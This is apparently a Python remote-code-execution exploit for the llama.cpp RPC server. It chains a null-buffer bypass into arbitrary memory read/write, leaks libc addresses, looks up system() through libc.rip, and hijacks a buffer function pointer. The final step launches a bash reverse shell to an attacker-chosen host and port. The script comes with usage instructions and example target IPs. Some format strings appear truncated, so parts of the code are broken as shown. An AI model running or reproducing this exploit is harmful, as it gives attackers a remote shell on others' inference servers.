#!/usr/bin/env python3 """ Linux RCE Exploit — llama.cpp RPC Server b8487 Auther: @casp3r0x0 Hassan Ali Null-buffer bypass (pre-PR #20908) → arbitrary R/W → Memory-only Reverse Shell Target: Any vulnerable distributed llama.cpp RPC Server Run: python3 linux_exploit.py Chain: 1. ALLOC_BUFFER → remote_ptr (ggml_backend_buffer*), buffer_base (data region) 2. Arb-read iface.get_base at remote_ptr+8 → function ptr in libggml-base.so 3. Scan backward for ELF magic → libbase_base 4. Arb-read GOT[memcpy] at libbase_base+0xa8598 → memory leak inside libc 5. Scan backward from memcpy to find libc_base, and extract .note.gnu.build-id 6. Query libc.rip API with the Build-ID to automatically resolve system() offset 7. Write reverse shell string (padded to 56 bytes) + system_addr to buffer_base 8. Arb-write those 64 bytes from buffer_base → remote_ptr (corrupts iface.clear) 9. Trigger RPC_CMD_BUFFER_CLEAR → calls iface.clear(rp) → system("bash -c ...") """ import socket import struct import sys import os import time # Protocol constants RPC_CMD_ALLOC_BUFFER = 0 RPC_CMD_BUFFER_GET_BASE = 3 RPC_CMD_SET_TENSOR = 6 RPC_CMD_GET_TENSOR = 8 RPC_CMD_GRAPH_COMPUTE = 10 RPC_CMD_DEVICE_COUNT = 15 RPC_CMD_HELLO = 14 GGML_TYPE_F32 = 0 GGML_OP_NONE = 0 GGML_OP_CPY = 34 GGML_MAX_SRC = 10 TENSOR_BYTES = 296 # Offsets (verified against b8487 build on this system) # iface.get_base function ptr is in libggml-base.so; scan finds that lib's base # libggml-base.so GOT slot for memcpy@GLIBC_2.14 BASE_GOT_MEMCPY = 0xa8598 # libc symbol offsets — GOT[memcpy] resolves to the AVX IFUNC implementation LIBC_OFF_MEMCPY = 0x1a0880 # __memmove_avx_unaligned_erms (IFUNC result on this CPU) LIBC_OFF_SYSTEM = 0x50d70 # system@@GLIBC_2.2.5 # ggml_backend_buffer iface field offsets IFACE_FREE_BUFFER = 0x00 # iface.free_buffer — we write command here IFACE_GET_BASE = 0x08 # iface.get_base — we write system_addr here class RPCClient: def __init__(self, host: str, port: int): self.host = host self.port = port self.sock = None def connect(self): print(f"[*] Connecting to {self.host}:{self.port}") self.sock = socket.create_connection((self.host, self.port), timeout=15) self.sock.sendall(bytes([RPC_CMD_HELLO])) self.sock.sendall(struct.pack('= 3: print(f"[+] Server version {v[0]}.{v[1]}.{v[2]}") def _recv_exact(self, n: int) -> bytes: buf = bytearray() while len(buf) < n: chunk = self.sock.recv(n - len(buf)) if not chunk: raise ConnectionError(f"Connection closed ({len(buf)}/{n} bytes)") buf.extend(chunk) return bytes(buf) def _send_cmd(self, cmd: int, data: bytes = b''): self.sock.sendall(bytes([cmd])) self.sock.sendall(struct.pack(' bytes: n = struct.unpack(' int: self._send_cmd(RPC_CMD_BUFFER_GET_BASE, struct.pack(' bytes: nb0 = 4 nb1 = n_elems * 4 d = bytearray() d += struct.pack(' bytes: """Read n_bytes from target_addr using the null-buffer CPY bypass.""" n_elems = max((n_bytes + 3) // 4, 1) src = self._pack_tensor(0x3001, 0, target_addr, GGML_OP_NONE, [], n_elems) dst = self._pack_tensor(0x3002, remote_ptr, buffer_base, GGML_OP_CPY, [0x3001], n_elems, flags=16) body = struct.pack(' int: d = self.arb_read(rp, bb, addr, 8) return struct.unpack('= 8 else None def read_dword(self, rp: int, bb: int, addr: int) -> int: d = self.arb_read(rp, bb, addr, 4) return struct.unpack('= 4 else None def read_string(self, rp: int, bb: int, addr: int, max_len: int = 256) -> bytes: d = self.arb_read(rp, bb, addr, max_len) idx = d.find(b'\x00') if idx != -1: return d[:idx] return d def find_elf_base(self, rp: int, bb: int, start: int, label: str, max_steps: int = 0x800) -> int: """Scan backwards from start (page-aligned) for ELF magic 0x7f454c46.""" addr = start & ~0xFFF for step in range(max_steps): sig = self.read_dword(rp, bb, addr) if sig == 0x464c457f: # b'\x7fELF' print(f" [+] {label} base: 0x{addr:016x} (step {step+1})") return addr addr -= 0x1000 return None def find_libc_system_via_buildid(self, rp: int, bb: int, libc_base: int) -> int: import urllib.request import json print("\n[Step 4.5] Leaking libc Build-ID and querying libc.rip...") # Read the first 0x4000 bytes from libc_base to find the .note.gnu.build-id head = self.arb_read(rp, bb, libc_base, 0x4000) pattern = b'\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00' idx = head.find(pattern) if idx == -1: print(" [-] Could not find Build-ID in libc header.") return None build_id = head[idx + 16 : idx + 36].hex() print(f" [+] Found Build-ID: {build_id}") print(f" [+] Fetching offsets from https://libc.rip ...") url = 'https://libc.rip/api/find' data = json.dumps({'buildid': build_id}).encode('utf-8') req = urllib.request.Request(url, data=data, headers={'Content-Type': 'application/json'}) try: with urllib.request.urlopen(req, timeout=15) as response: res = json.loads(response.read().decode('utf-8')) if res and isinstance(res, list) and len(res) > 0: lib = res[0] print(f" [+] Matched libc: {lib['id']}") if 'system' in lib['symbols']: sys_off = int(lib['symbols']['system'], 16) return sys_off except Exception as e: print(f" [-] Failed to query API: {e}") return None # Main exploit def exploit(host: str, port: int, lhost: str, lport: int): client = RPCClient(host, port) client.connect() # Stage 1: Allocate a staging buffer print("\n[Step 1] Allocating staging buffer") remote_ptr, alloc_sz = client.alloc_buffer(0x10000) buffer_base = client.get_buffer_base(remote_ptr) print(f" remote_ptr = 0x{remote_ptr:016x} (ggml_backend_buffer*)") print(f" buffer_base = 0x{buffer_base:016x} (data region)") rp, bb = remote_ptr, buffer_base # Stage 2: Leak function pointer from iface.get_base print("\n[Step 2] Leaking iface.get_base function pointer") getbase_ptr = client.read_qword(rp, bb, rp + IFACE_GET_BASE) print(f" iface.get_base = 0x{getbase_ptr:016x}") if not getbase_ptr or getbase_ptr < 0x700000000000: print("[-] Unexpected pointer — check layout") return # Stage 3: Find libggml-base.so base print("\n[Step 3] Scanning backward for ELF magic → libggml-base.so base") libbase_base = client.find_elf_base(rp, bb, getbase_ptr, "libggml-base.so") if not libbase_base: print("[-] Could not find libggml-base ELF base"); return print(f" libbase_base = 0x{libbase_base:016x}") # Stage 4: Read GOT[memcpy] to leak libc print("\n[Step 4] Reading GOT[memcpy] → libc leak") memcpy_addr = client.read_qword(rp, bb, libbase_base + BASE_GOT_MEMCPY) print(f" memcpy@libc = 0x{memcpy_addr:016x}") # We find libc_base dynamically libc_base = client.find_elf_base(rp, bb, memcpy_addr, "libc.so.6") if not libc_base: print("[-] Could not find libc base automatically!") return print(f" libc_base = 0x{libc_base:016x}") # Automatically get system offset by parsing remote memory Build-ID # and fetching from libc.rip archive database! sys_offset = client.find_libc_system_via_buildid(rp, bb, libc_base) if sys_offset: print(f" [+] Automatically pulled system offset: 0x{sys_offset:x}") system_addr = libc_base + sys_offset else: print(" [!] Falling back to hardcoded system offset.") system_addr = libc_base + LIBC_OFF_SYSTEM print(f" [+] Final payload variables:") print(f" libc_base = 0x{libc_base:016x}") print(f" system() = 0x{system_addr:016x}") # Stage 5: Write payload to buffer_base print("\n[Step 5] Writing payload to buffer_base") cmd = f'bash -c "bash -i>&/dev/tcp/{lhost}/{lport} 0>&1"'.encode() if len(cmd) > 55: print("[-] Payload too long (must be <= 55 chars)!") return payload = cmd.ljust(56, b'\x00') + struct.pack(' ") print(f" rpc_host — target RPC server IP") print(f" rpc_port — target RPC server port (default 50052)") print(f" lhost — your IP for the reverse shell to connect back to") print(f" lport — your listening port") print(f"\nExample: {sys.argv[0]} 10.10.10.5 50052 10.10.14.1 4444") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) lhost = sys.argv[3] lport = int(sys.argv[4]) exploit(host, port, lhost, lport)